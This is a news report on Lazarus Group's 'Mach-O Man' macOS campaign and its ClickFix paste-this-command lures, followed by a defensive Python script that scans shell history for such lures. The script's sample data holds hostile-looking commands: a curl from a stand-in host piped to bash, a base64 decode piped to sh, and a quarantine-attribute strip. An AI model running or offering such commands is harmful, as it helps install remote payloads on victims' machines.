Lazarus Group, a cybercrime syndicate long associated with North Korea, is shifting its focus from traditional banking heists to major attacks on the cryptocurrency and fintech industries. Since 2017, analysts estimate Lazarus has been responsible for thefts totaling $6.7 billion. The group’s latest operation, dubbed “Mach-O Man,” is specifically targeting executives and businesses across digital finance, exploiting new vulnerabilities to access vast sums in digital assets.
Mach-O Man targets crypto and fintech leaders
Natalie Newson, a blockchain security expert at CertiK, has been closely monitoring Lazarus Group’s operations within crypto and fintech. In just the last two weeks, Lazarus stole upwards of $500 million in digital assets from platforms such as Drift and KelpDAO. Investigators stress that the Mach-O Man campaign is not an isolated incident but a coordinated mission backed and orchestrated at the state level by North Korea.
This sophisticated approach singles out both institutions and top executives in crypto and finance. Experts now see North Korea’s digital theft as a systemic, state-run revenue source. There is also growing concern among security professionals that variations of the Mach-O Man technique could be adopted by other criminal organizations worldwide.
How ClickFix social engineering exploits work
The hallmark of the Mach-O Man attack is its use of modular macOS malware, developed by Lazarus’s “Chollima” subunit and designed to compromise crypto and fintech applications on Apple systems. According to Newson, the malware is delivered through a targeted social engineering ploy known as “ClickFix.”
Attackers contact executives via Telegram, sending urgent meeting requests. Victims are then redirected to deceptively authentic sites mimicking known platforms like Zoom, Microsoft Teams, or Google Meet. They are told connection issues require them to paste a provided command into their terminal, unwittingly granting hackers direct access to corporate systems and financial assets.
Newson explains that “the page appears entirely legitimate, and the instructions seem routine—the victim initiates the action themselves, so conventional security checks rarely detect the attack.”
DeFi projects face heightened risks
Mach-O Man’s sophistication has raised alarm throughout the sector, posing serious threats to both organizations and individuals—particularly in the DeFi landscape. Security researcher Vladimir S. reports that attackers have even seized control of DeFi project domains, replacing original websites with fraudulent Cloudflare prompts that instruct users to execute malicious commands for “authentication.”
The prompts are convincing enough that most users, including senior staff, comply without hesitation, inadvertently opening the door to total platform compromise. The malware is engineered to erase itself rapidly, leaving virtually no digital footprint and making forensic tracing extremely difficult.
Newson observes, “Most victims never realize they’ve been breached. Even if they do, it’s almost impossible to identify which variant infiltrated their systems.”
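Both the ClickFix lure described above and the fake Cloudflare "authentication" prompts share one trait: the victim types or pastes a command into their own terminal, so the command lands in the shell history even when the payload later deletes itself. The following detection sketch is an added example and is not code from the article, CertiK, or any named researcher; it scans macOS zsh history for generic "paste this into your terminal" hallmarks. The rule set, the rule names, and the history lines are all constructed assumptions for illustration, not indicators tied to the Mach-O Man campaign.

```python
import re
from dataclasses import dataclass

# Assumed, illustrative heuristics for "paste this into your terminal" lures:
# a remote fetch piped straight into a shell, an inline base64 decode feeding an
# interpreter, and removal of the macOS quarantine attribute before execution.
PATTERNS = {
    "fetch_pipe_shell": re.compile(
        r"\b(curl|wget)\b[^|;\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "base64_to_interpreter": re.compile(
        r"base64\s+(-d|--decode|-D)\b[^|;\n]*\|\s*(sudo\s+)?"
        r"((ba|z)?sh|python3?|perl|osascript)\b"
    ),
    "quarantine_strip": re.compile(
        r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine"
    ),
}


@dataclass
class Finding:
    line_no: int   # 1-based position in the history file
    rule: str      # name of the heuristic that fired
    command: str   # the command as the user typed it


def parse_zsh_history_line(raw):
    # zsh extended history stores ": <epoch>:<duration>;<command>";
    # plain history (and bash) stores just the command.
    m = re.match(r"^: \d+:\d+;(.*)$", raw)
    return m.group(1) if m else raw


def scan_history(lines):
    """Return one Finding per history line that matches a heuristic."""
    findings = []
    for i, raw in enumerate(lines, 1):
        cmd = parse_zsh_history_line(raw.rstrip("\n"))
        for rule, rx in PATTERNS.items():
            if rx.search(cmd):
                findings.append(Finding(i, rule, cmd))
                break  # report the first matching rule per line
    return findings


def scan_history_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.readlines())


# Constructed sample history: benign commands around three lure-style entries.
# The host name uses the reserved .invalid TLD; nothing here is a real indicator.
SAMPLE_HISTORY = [
    ": 1700000000:0;git status",
    ": 1700000005:0;brew upgrade",
    ": 1700000010:0;curl -fsSL https://meet-fix.example.invalid/fix.sh | bash",
    ": 1700000020:0;echo aGVsbG8= | base64 -d | sh",
    ": 1700000030:0;xattr -d com.apple.quarantine ~/Downloads/ZoomFix.app",
    "ls -la",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: [{f.rule}] {f.command}")
```

Run against a real file with `scan_history_file("/Users/<user>/.zsh_history")` from an endpoint agent or a scheduled job; in practice you would also forward matches to a SIEM and pair them with process-execution telemetry, since history is easy for an intruder to edit after the fact.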
Specialists warn that Lazarus Group’s attacks are no longer episodic news items—they now represent a persistent, high-stakes threat to the entire crypto ecosystem. Those active within fintech and digital currency realms are urged to increase both technical and social vigilance to preempt future incursions.